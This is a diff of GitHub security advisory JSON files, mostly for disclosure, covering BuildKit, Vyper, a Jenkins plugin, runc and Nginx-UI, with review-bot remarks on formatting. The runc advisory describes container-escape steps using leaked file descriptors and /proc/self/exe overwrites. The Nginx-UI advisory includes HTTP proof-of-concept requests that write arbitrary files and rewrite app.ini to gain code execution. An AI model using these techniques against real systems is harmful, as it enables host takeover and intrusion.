+ "details": "### Impact\nIn addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request.\n\n### Patches\nThe issue has been fixed in v0.12.5 .\n\n### Workarounds\nAvoid using BuildKit frontends from untrusted sources. A frontend image is usually specified as the `#syntax` line on your Dockerfile, or with `--frontend` flag when using `buildctl build` command.\n\n### References\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/moby/buildkit"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.12.5"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23653"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/moby/buildkit/pull/4602"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/moby/buildkit"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/moby/buildkit/releases/tag/v0.12.5"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-863"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-31T22:43:20Z",
+ "nvd_published_at": "2024-01-31T22:15:54Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-x22x-5pp9-8v7f/GHSA-x22x-5pp9-8v7f.json b/advisories/github-reviewed/2024/01/GHSA-x22x-5pp9-8v7f/GHSA-x22x-5pp9-8v7f.json
index f2e063caafb04..230f2fd92dd29 100644
--- a/advisories/github-reviewed/2024/01/GHSA-x22x-5pp9-8v7f/GHSA-x22x-5pp9-8v7f.json
+++ b/advisories/github-reviewed/2024/01/GHSA-x22x-5pp9-8v7f/GHSA-x22x-5pp9-8v7f.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-x22x-5pp9-8v7f",
- "modified": "2024-01-24T21:51:55Z",
+ "modified": "2024-01-29T21:54:26Z",
 "published": "2024-01-24T18:31:02Z",
 "aliases": [
 "CVE-2024-23905"
@@ -9,7 +9,10 @@
 "summary": "Content-Security-Policy disabled by Red Hat Dependency Analytics Jenkins Plugin",
 "details": "Jenkins sets the Content-Security-Policy header to static files served by Jenkins (specifically DirectoryBrowserSupport), such as workspaces, /userContent, or archived artifacts, unless a Resource Root URL is specified.\n\nRed Hat Dependency Analytics Plugin 0.7.1 and earlier globally disables the Content-Security-Policy header for static files served by Jenkins whenever the 'Invoke Red Hat Dependency Analytics (RHDA)' build step is executed. This allows cross-site scripting (XSS) attacks by users with the ability to control files in workspaces, archived artifacts, etc.\n",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 {
diff --git a/advisories/github-reviewed/2024/01/GHSA-x2c2-q32w-4w6m/GHSA-x2c2-q32w-4w6m.json b/advisories/github-reviewed/2024/01/GHSA-x2c2-q32w-4w6m/GHSA-x2c2-q32w-4w6m.json
new file mode 100644
index 0000000000000..51b8f4128bec9
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-x2c2-q32w-4w6m/GHSA-x2c2-q32w-4w6m.json
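Review bot: The `details` string of the new GHSA-wr6v-9f75-vh2g file ends with an empty heading (`\n\n### References\n\n`), so the rendered advisory shows a "References" section with no content; either drop the heading or have it point at the fix PR and release that the structured `references` list already carries (`https://github.com/moby/buildkit/pull/4602` and `https://github.com/moby/buildkit/releases/tag/v0.12.5`). The same string has a stray space before the period in `fixed in v0.12.5 .`. The structured fields are internally consistent (`"fixed": "0.12.5"` matches the release tag), but the free text is what most readers of the advisory see.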
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x2c2-q32w-4w6m",
+ "modified": "2024-01-30T21:34:11Z",
+ "published": "2024-01-30T18:42:28Z",
+ "aliases": [
+ "CVE-2024-24567"
+ ],
+ "summary": "Vyper's raw_call `value=` kwargs not disabled for static and delegate calls",
+ "details": "### Summary\nVyper compiler allows passing a value in builtin `raw_call` even if the call is a `delegatecall` or a `staticcall`. But in the context of `delegatecall` and `staticcall` the handling of value is not possible due to the semantics of the respective opcodes, and vyper will silently ignore the `value=` argument.\n\nA contract search was performed and no vulnerable contracts were found in production.\n\n### Details\nThe IR for `raw_call` is built in the `RawCall` class:\nhttps://github.com/vyperlang/vyper/blob/9136169468f317a53b4e7448389aa315f90b95ba/vyper/builtins/functions.py#L1100\n\nHowever, the compiler doesn't validate that if either `delegatecall` or `staticall` are provided as kwargs, that `value` wasn't set. For example, the following compiles without errors:\n```python\nraw_call(self, call_data2, max_outsize=255, is_delegate_call=True, value=msg.value/2)\n```\n\n### Impact\nIf the semantics of the EVM are unknown to the developer, he could suspect that by specifying the `value` kwarg, exactly the given amount will be sent along to the target. 
However in fact, no `value` will be sent.\n\nHere is an example of an potentially problematic implementation of multicall utilizing the `raw_call` built-in:\n```python\nvalue_accumulator: uint256 = empty(uint256)\n results: DynArray[Result, max_value(uint8)] = []\n return_data: Bytes[max_value(uint8)] = b\"\"\n success: bool = empty(bool)\n for batch in data:\n msg_value: uint256 = batch.value\n value_accumulator = unsafe_add(value_accumulator, msg_value)\n if (batch.allow_failure == False):\n return_data = raw_call(self, batch.call_data, max_outsize=255, value=msg_value, is_delegate_call=True)\n success = True\n results.append(Result({success: success, return_data: return_data}))\n else:\n success, return_data = \\\n raw_call(self, batch.call_data, max_outsize=255, value=msg_value, is_delegate_call=True, revert_on_failure=False)\n results.append(Result({success: success, return_data: return_data}))\n assert msg.value == value_accumulator, \"Multicall: value mismatch\"\n return results\n```\n\n### Patches\n_Has the problem been patched? 
What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n### References\n_Are there any links users can visit to find out more?_\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "vyper"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "0.3.10"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/vyperlang/vyper/security/advisories/GHSA-x2c2-q32w-4w6m"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24567"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/vyperlang/vyper"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/vyperlang/vyper/blob/9136169468f317a53b4e7448389aa315f90b95ba/vyper/builtins/functions.py#L1100"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-754"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T18:42:28Z",
+ "nvd_published_at": "2024-01-30T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-xq62-62c9-22mg/GHSA-xq62-62c9-22mg.json b/advisories/github-reviewed/2024/01/GHSA-xq62-62c9-22mg/GHSA-xq62-62c9-22mg.json
deleted file mode 100644
index 4df8bee365c2a..0000000000000
--- a/advisories/github-reviewed/2024/01/GHSA-xq62-62c9-22mg/GHSA-xq62-62c9-22mg.json
+++ /dev/null
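Review bot: The `details` string of the new GHSA-x2c2-q32w-4w6m file still contains the unfilled GitHub advisory template prompts under `### Patches`, `### Workarounds` and `### References` (`_Has the problem been patched? What versions should users upgrade to?_` and the two sibling questions), so the rendered advisory gives readers no remediation guidance at all. The structured `affected` range uses `"last_affected": "0.3.10"` rather than a `fixed` event, which implies no fixed release was known when this was written; the text should state that explicitly, e.g. `No fixed release is available at the time of writing; 0.3.10 is the last known affected version.`, and the empty References section should either be removed or reuse the `functions.py#L1100` link already present under `references`. When a fix ships, the `last_affected` event and this text need to be updated together, since consumers that only read the structured range will otherwise keep treating every later version as affected.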
@@ -1,68 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-xq62-62c9-22mg",
- "modified": "2024-01-11T15:43:15Z",
- "published": "2024-01-11T15:43:15Z",
- "aliases": [
- "CVE-2019-6342"
- ],
- "summary": "Drupal Improper Access Control",
- "details": "An access bypass vulnerability exists when the experimental Workspaces module in Drupal 8 core is enabled. This can be mitigated by disabling the Workspaces module. It does not affect any release other than Drupal 8.7.4.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
- {
- "package": {
- "ecosystem": "Packagist",
- "name": "drupal/core"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "8.7.4"
- },
- {
- "fixed": "8.7.5"
- }
- ]
- }
- ],
- "versions": [
- "8.7.4"
- ]
- }
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6342"
- },
- {
- "type": "WEB",
- "url": "https://github.com/drupal/core/commit/bac9bde22bb545ff72570d8a46055c6c6e70e7c5"
- },
- {
- "type": "PACKAGE",
- "url": "https://github.com/drupal/core"
- },
- {
- "type": "WEB",
- "url": "https://www.drupal.org/sa-core-2019-008"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-284"
- ],
- "severity": "CRITICAL",
- "github_reviewed": true,
- "github_reviewed_at": "2024-01-11T15:43:15Z",
- "nvd_published_at": "2020-05-28T21:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-xr7r-f8xq-vfvv/GHSA-xr7r-f8xq-vfvv.json b/advisories/github-reviewed/2024/01/GHSA-xr7r-f8xq-vfvv/GHSA-xr7r-f8xq-vfvv.json
new file mode 100644
index 0000000000000..ad45a14c121a9
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-xr7r-f8xq-vfvv/GHSA-xr7r-f8xq-vfvv.json
@@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xr7r-f8xq-vfvv", + "modified": "2024-02-02T16:35:22Z", + "published": "2024-01-31T22:44:08Z", + "aliases": [ + "CVE-2024-21626" + ], + "summary": "runc vulnerable to container breakout through process.cwd trickery and leaked fds", + "details": "### Impact\n\nIn runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from `runc exec`) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem (\"attack 2\"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through `runc run` (\"attack 1\"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes (\"attack 3a\" and \"attack 3b\").\n\nStrictly speaking, while attack 3a is the most severe from a CVSS perspective, attacks 2 and 3b are arguably more dangerous in practice because they allow for a breakout from inside a container as opposed to requiring a user execute a malicious image. The reason attacks 1 and 3a are scored higher is because being able to socially engineer users is treated as a given for UI:R vectors, despite attacks 2 and 3b requiring far more minimal user interaction (just reasonable `runc exec` operations on a container the attacker has access to). In any case, all four attacks can lead to full control of the host system.\n\n#### Attack 1: `process.cwd` \"mis-configuration\"\n\nIn runc 1.1.11 and earlier, several file descriptors were inadvertently leaked internally within runc into `runc init`, including a handle to the host's `/sys/fs/cgroup` (this leak was added in v1.0.0-rc93). 
If the container was configured to have `process.cwd` set to `/proc/self/fd/7/` (the actual fd can change depending on file opening order in `runc`), the resulting pid1 process will have a working directory in the host mount namespace and thus the spawned process can access the entire host filesystem. This alone is not an exploit against runc, however a malicious image could make any innocuous-looking non-`/` path a symlink to `/proc/self/fd/7/` and thus trick a user into starting a container whose binary has access to the host filesystem.\n\nFurthermore, prior to runc 1.1.12, runc also did not verify that the final working directory was inside the container's mount namespace after calling `chdir(2)` (as we have already joined the container namespace, it was incorrectly assumed there would be no way to chdir outside the container after `pivot_root(2)`).\n\nThe CVSS score for this attack is CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N (8.2, high severity).\n\nNote that this attack requires a privileged user to be tricked into running a malicious container image. It should be noted that when using higher-level runtimes (such as Docker or Kubernetes), this exploit can be considered critical as it can be done remotely by anyone with the rights to start a container image (and can be exploited from within Dockerfiles using `ONBUILD` in the case of Docker).\n\n#### Attack 2: `runc exec` container breakout\n\n(This is a modification of attack 1, constructed to allow for a process inside a container to break out.)\n\nThe same fd leak and lack of verification of the working directory in attack 1 also apply to `runc exec`. If a malicious process inside the container knows that some administrative process will call `runc exec` with the `--cwd` argument and a given path, in most cases they can replace that path with a symlink to `/proc/self/fd/7/`. 
Once the container process has executed the container binary, `PR_SET_DUMPABLE` protections no longer apply and the attacker can open `/proc/$exec_pid/cwd` to get access to the host filesystem.\n\n`runc exec` defaults to a cwd of `/` (which cannot be replaced with a symlink), so this attack depends on the attacker getting a user (or some administrative process) to use `--cwd` and figuring out what path the target working directory is. Note that if the target working directory is a parent of the program binary being executed, the attacker might be unable to replace the path with a symlink (the `execve` will fail in most cases, unless the host filesystem layout specifically matches the container layout in specific ways and the attacker knows which binary the `runc exec` is executing).\n\nThe CVSS score for this attack is CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N (7.2, high severity).\n\n#### Attacks 3a and 3b: `process.args` host binary overwrite attack\n\n(These are modifications of attacks 1 and 2, constructed to overwrite a host binary by using `execve` to bring a magic-link reference into the container.)\n\nAttacks 1 and 2 can be adapted to overwrite a host binary by using a path like `/proc/self/fd/7/../../../bin/bash` as the `process.args` binary argument, causing a host binary to be executed by a container process. The `/proc/$pid/exe` handle can then be used to overwrite the host binary, as seen in CVE-2019-5736 (note that the same `#!` trick can be used to avoid detection as an attacker). As the overwritten binary could be something like `/bin/bash`, as soon as a privileged user executes the target binary on the host, the attacker can pivot to gain full access to the host.\n\nFor the purposes of CVSS scoring:\n\n* Attack 3a is attack 1 but adapted to overwrite a host binary, where a malicious image is set up to execute `/proc/self/fd/7/../../../bin/bash` and run a shell script that overwrites `/proc/self/exe`, overwriting the host copy of `/bin/bash`. 
The CVSS score for this attack is CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H (8.6, high severity).\n* Attack 3b is attack 2 but adapted to overwrite a host binary, where the malicious container process overwrites all of the possible `runc exec` target binaries inside the container (such as `/bin/bash`) such that a host target binary is executed and then the container process opens `/proc/$pid/exe` to get access to the host binary and overwrite it. The CVSS score for this attack is CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H (8.2, high severity).\n\nAs mentioned in attack 1, while 3b is scored lower it is more dangerous in practice as it doesn't require a user to run a malicious image.\n\n### Patches\nrunc 1.1.12 has been released, and includes patches for this issue. Note that there are four separate fixes applied:\n\n* Checking that the working directory is actually inside the container by checking whether `os.Getwd` returns `ENOENT` (Linux provides a way of detecting if cwd is outside the current namespace root). This explicitly blocks runc from executing a container process when inside a non-container path and thus eliminates attacks 1 and 2 even in the case of fd leaks.\n* Close all internal runc file descriptors in the final stage of `runc init`, right before `execve`. This ensures that internal file descriptors cannot be used as an argument to `execve` and thus eliminates attacks 3a and 3b, even in the case of fd leaks. 
This requires hooking into some Go runtime internals to make sure we don't close critical Go internal file descriptors.\n* Fixing the specific fd leaks that made these bug exploitable (mark `/sys/fs/cgroup` as `O_CLOEXEC` and backport a fix for some `*os.File` leaks).\n* In order to protect against future `runc init` file descriptor leaks, mark all non-stdio files as `O_CLOEXEC` before executing `runc init`.\n\n### Other Runtimes\n\nWe have discovered that several other container runtimes are either potentially vulnerable to similar attacks, or do not have sufficient protection against attacks of this nature. We recommend other container runtime authors look at [our patches](#Patches) and make sure they at least add a `getcwd() != ENOENT` check as well as consider whether `close_range(3, UINT_MAX, CLOSE_RANGE_CLOEXEC)` before executing their equivalent of `runc init` is appropriate.\n\n * crun 1.12 does not leak any useful file descriptors into the `runc init`-equivalent process (so this attack is _not exploitable_ as far as we can tell), but no care is taken to make sure all non-stdio files are `O_CLOEXEC` and there is no check after `chdir(2)` to ensure the working directory is inside the container. If a file descriptor happened to be leaked in the future, this could be exploitable. In addition, any file descriptors passed to `crun` are not closed until the container process is executed, meaning that easily-overlooked programming errors by users of `crun` can lead to these attacks becoming exploitable.\n * youki 0.3.1 does not leak any useful file descriptors into the `runc init`-equivalent process (so this attack is _not exploitable_ as far as we can tell) however this appears to be pure luck. `youki` does leak a directory file descriptor from the host mount namespace, but it just so happens that the directory is the rootfs of the container (which then gets `pivot_root`'d into and so ends up as a in-root path thanks to `chroot_fs_refs`). 
In addition, no care is taken to make sure all non-stdio files are `O_CLOEXEC` and there is no check after `chdir(2)` to ensure the working directory is inside the container. If a file descriptor happened to be leaked in the future, this could be exploitable. In addition, any file descriptors passed to `youki` are not closed until the container process is executed, meaning that easily-overlooked programming errors by users of `youki` can lead to these attacks becoming exploitable.\n * LXC 5.0.3 does not appear to leak any useful file descriptors, and they have comments noting the importance of not leaking file descriptors in `lxc-attach`. However, they don't seem to have any proactive protection against file descriptor leaks at the point of `chdir` such as using `close_range(...)` (they do have RAII-like `__do_fclose` closers but those don't necessarily stop all leaks in this context) nor do they have any check after `chdir(2)` to ensure the working directory is inside the container. Unfortunately it seems they cannot use `CLOSE_RANGE_CLOEXEC` because they don't need to re-exec themselves.\n\n### Workarounds\nFor attacks 1 and 2, only permit containers (and `runc exec`) to use a `process.cwd` of `/`. 
It is not possible for `/` to be replaced with a symlink (the path is resolved from within the container's mount namespace, and you cannot change the root of a mount namespace or an fs root to a symlink).\n\nFor attacks 1 and 3a, only permit users to run trusted images.\n\nFor attack 3b, there is no practical workaround other than never using `runc exec` because any binary you try to execute with `runc exec` could end up being a malicious binary target.\n\n### See Also\n* https://www.cve.org/CVERecord?id=CVE-2024-21626\n* https://github.com/opencontainers/runc/releases/tag/v1.1.12\n* The runc 1.1.12 merge commit https://github.com/opencontainers/runc/commit/a9833ff391a71b30069a6c3f816db113379a4346, which contains the following security patches:\n * https://github.com/opencontainers/runc/commit/506552a88bd3455e80a9b3829568e94ec0160309\n * https://github.com/opencontainers/runc/commit/0994249a5ec4e363bfcf9af58a87a722e9a3a31b\n * https://github.com/opencontainers/runc/commit/fbe3eed1e568a376f371d2ced1b4ac16b7d7adde\n * https://github.com/opencontainers/runc/commit/284ba3057e428f8d6c7afcc3b0ac752e525957df\n * https://github.com/opencontainers/runc/commit/b6633f48a8c970433737b9be5bfe4f25d58a5aa7\n * https://github.com/opencontainers/runc/commit/683ad2ff3b01fb142ece7a8b3829de17150cf688\n * https://github.com/opencontainers/runc/commit/e9665f4d606b64bf9c4652ab2510da368bfbd951\n\n### Credits\n\nThanks to Rory McNamara from Snyk for discovering and disclosing the original vulnerability (attack 1) to Docker, @lifubang from acmcoder for discovering how to adapt the attack to overwrite host binaries (attack 3a), and Aleksa Sarai from SUSE for discovering how to adapt the attacks to work as container breakouts using `runc exec` (attacks 2 and 3b).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/opencontainers/runc" + }, + "ranges": [ + { + 
"type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0-rc93" + }, + { + "fixed": "1.1.12" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1.11" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21626" + }, + { + "type": "WEB", + "url": "https://github.com/opencontainers/runc/commit/02120488a4c0fc487d1ed2867e901eeed7ce8ecf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/opencontainers/runc" + }, + { + "type": "WEB", + "url": "https://github.com/opencontainers/runc/releases/tag/v1.1.12" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SYMO3BANINS6RGFQFKPRG4FIOJ7GWYTL/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176993/runc-1.1.11-File-Descriptor-Leak-Privilege-Escalation.html" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/01/1" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/02/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-403" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:44:08Z", + "nvd_published_at": "2024-01-31T22:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-xvq9-4vpv-227m/GHSA-xvq9-4vpv-227m.json b/advisories/github-reviewed/2024/01/GHSA-xvq9-4vpv-227m/GHSA-xvq9-4vpv-227m.json new file mode 100644 index 0000000000000..7122863f26765 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-xvq9-4vpv-227m/GHSA-xvq9-4vpv-227m.json 
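Review bot: The structured `references` list of the new GHSA-xr7r-f8xq-vfvv file names a single fixing commit, `https://github.com/opencontainers/runc/commit/02120488a4c0fc487d1ed2867e901eeed7ce8ecf`, which does not appear anywhere in the advisory's own `### See Also` section; that section instead names the 1.1.12 merge commit `a9833ff391a71b30069a6c3f816db113379a4346` plus seven individual patch commits. Tooling that consumes only the structured references, not the free-text `details`, therefore cannot reach the release merge commit. If `02120488` is the main-branch counterpart of those patches, adding the merge commit as a further `"type": "WEB"` reference would make the structured data agree with the prose. The `details` string also carries a duplicated word in its first paragraph (`could be also be used`). The advisory-level vector `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H` matches the per-attack score given for attack 3a in the text, so the severity fields are consistent.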
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xvq9-4vpv-227m", + "modified": "2024-01-29T22:30:18Z", + "published": "2024-01-29T22:30:18Z", + "aliases": [ + "CVE-2024-23827" + ], + "summary": "Nginx-UI vulnerable to arbitrary file write through the Import Certificate feature", + "details": "### Summary\n\nThe Import Certificate feature allows arbitrary write into the system. The feature does not check if the provided user input is a certification/key and allows to write into arbitrary paths in the system.\n\nhttps://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/api/certificate/certificate.go#L72\n\n```\nfunc AddCert(c *gin.Context) {\n\tvar json struct {\n\t\tName string `json:\"name\"`\n\t\tSSLCertificatePath string `json:\"ssl_certificate_path\" binding:\"required\"`\n\t\tSSLCertificateKeyPath string `json:\"ssl_certificate_key_path\" binding:\"required\"`\n\t\tSSLCertificate string `json:\"ssl_certificate\"`\n\t\tSSLCertificateKey string `json:\"ssl_certificate_key\"`\n\t\tChallengeMethod string `json:\"challenge_method\"`\n\t\tDnsCredentialID int `json:\"dns_credential_id\"`\n\t}\n\tif !api.BindAndValid(c, &json) {\n\t\treturn\n\t}\n\tcertModel := &model.Cert{\n\t\tName: json.Name,\n\t\tSSLCertificatePath: json.SSLCertificatePath,\n\t\tSSLCertificateKeyPath: json.SSLCertificateKeyPath,\n\t\tChallengeMethod: json.ChallengeMethod,\n\t\tDnsCredentialID: json.DnsCredentialID,\n\t}\n\n\terr := certModel.Insert()\n\n\tif err != nil {\n\t\tapi.ErrHandler(c, err)\n\t\treturn\n\t}\n\n\tcontent := &cert.Content{\n\t\tSSLCertificatePath: json.SSLCertificatePath,\n\t\tSSLCertificateKeyPath: json.SSLCertificateKeyPath,\n\t\tSSLCertificate: json.SSLCertificate,\n\t\tSSLCertificateKey: json.SSLCertificateKey,\n\t}\n\n\terr = content.WriteFile()\n\n\tif err != nil {\n\t\tapi.ErrHandler(c, err)\n\t\treturn\n\t}\n\n\tc.JSON(http.StatusOK, 
Transformer(certModel))\n}\n\n```\nhttps://github.com/0xJacky/nginx-ui/blob/f20d97a9fdc2a83809498b35b6abc0239ec7fdda/internal/cert/write_file.go#L15\n\n```\nfunc (c *Content) WriteFile() (err error) {\n\t// MkdirAll creates a directory named path, along with any necessary parents,\n\t// and returns nil, or else returns an error.\n\t// The permission bits perm (before umask) are used for all directories that MkdirAll creates.\n\t// If path is already a directory, MkdirAll does nothing and returns nil.\n\n\terr = os.MkdirAll(filepath.Dir(c.SSLCertificatePath), 0644)\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = os.MkdirAll(filepath.Dir(c.SSLCertificateKeyPath), 0644)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif c.SSLCertificate != \"\" {\n\t\terr = os.WriteFile(c.SSLCertificatePath, []byte(c.SSLCertificate), 0644)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\tif c.SSLCertificateKey != \"\" {\n\t\terr = os.WriteFile(c.SSLCertificateKeyPath, []byte(c.SSLCertificateKey), 0644)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t}\n\n\treturn\n}\n```\n\n\n### PoC\n\n```\nPOST /api/cert HTTP/1.1\nHost: 127.0.0.1:9000\nContent-Length: 144\nAccept: application/json, text/plain, */*\nAuthorization: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7\nConnection: close\n\n{\"name\":\"poc\",\"ssl_certificate_path\":\"/tmp/test\",\"ssl_certificate_key_path\":\"/tmp/test2\",\"ssl_certificate\":\"test\",\"ssl_certificate_key\":\"test2\"}\n```\n\n```\nroot@aze:~/nginx# ls -la /tmp/test*\n-rw-r--r-- 1 root root 4 Jan 24 13:33 /tmp/test\n-rw-r--r-- 1 root root 5 Jan 24 13:33 /tmp/test2\n```\n\nIt's possible to leverage it into an RCE in a senario by overwriting the config file app.ini - But it will require the app.\n\n```\nroot@aze:~/nginx# cat app.ini | grep \"StartCmd\"\nStartCmd = 
login\n```\nThen we overwrite the `StartCmd` with `bash`\n\n```\nPOST /api/cert HTTP/1.1\nHost: 127.0.0.1:9000\nContent-Length: 980\nAccept: application/json, text/plain, */*\nAuthorization: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nContent-Type: application/json\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8,fr;q=0.7\nConnection: close\n\n{\"name\":\"poc\",\"ssl_certificate_path\":\"/root/nginx/app.ini\",\"ssl_certificate_key_path\":\"/tmp/test2\",\"ssl_certificate\":\"[server]\\r\\nHttpHost = 0.0.0.0\\r\\nHttpPort = 9000\\r\\nRunMode = debug\\r\\nJwtSecret = 504f334b-ac68-4fbc-9160-2ecbf9e5794c\\r\\nNodeSecret = 139ab224-9e9e-444f-987e-b3a651175ad5\\r\\nHTTPChallengePort = 9180\\r\\nEmail = props@pros.com\\r\\nDatabase = database\\r\\nStartCmd = bash\\r\\nCADir = dqsdqsd\\r\\nDemo = false\\r\\nPageSize = 10\\r\\nGithubProxy = dqsdqfsdfsdfsdfsd\\r\\n\\r\\n[nginx]\\r\\nAccessLogPath =\\r\\nErrorLogPath =\\r\\nConfigDir =\\r\\nPIDPath =\\r\\nTestConfigCmd =\\r\\nReloadCmd =\\r\\nRestartCmd =\\r\\n\\r\\n[openai]\\r\\nBaseUrl = \\r\\nToken =\\r\\nProxy =\\r\\nModel = \\r\\n\\r\\n[casdoor]\\r\\nEndpoint =\\r\\nClientId =\\r\\nClientSecret =\\r\\nCertificate =\\r\\nOrganization =\\r\\nApplication =\\r\\nRedirectUri =\",\"ssl_certificate_key\":\"test2\"}\n```\n\n```\nroot@aze:~/nginx# cat app.ini | grep \"StartCmd\"\nStartCmd = bash\n```\n\nFor the new config to be applied the app needs to be restarted\n\n![image](https://user-images.githubusercontent.com/26652608/299331664-6415a8c1-6611-4e53-8137-3e574c58da28.png)\n\n\n\n### Impact\n\nArbitrary write/overwrite into the host file system with a risk of remote code execution if the app restarts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/0xJacky/Nginx-UI" + }, + 
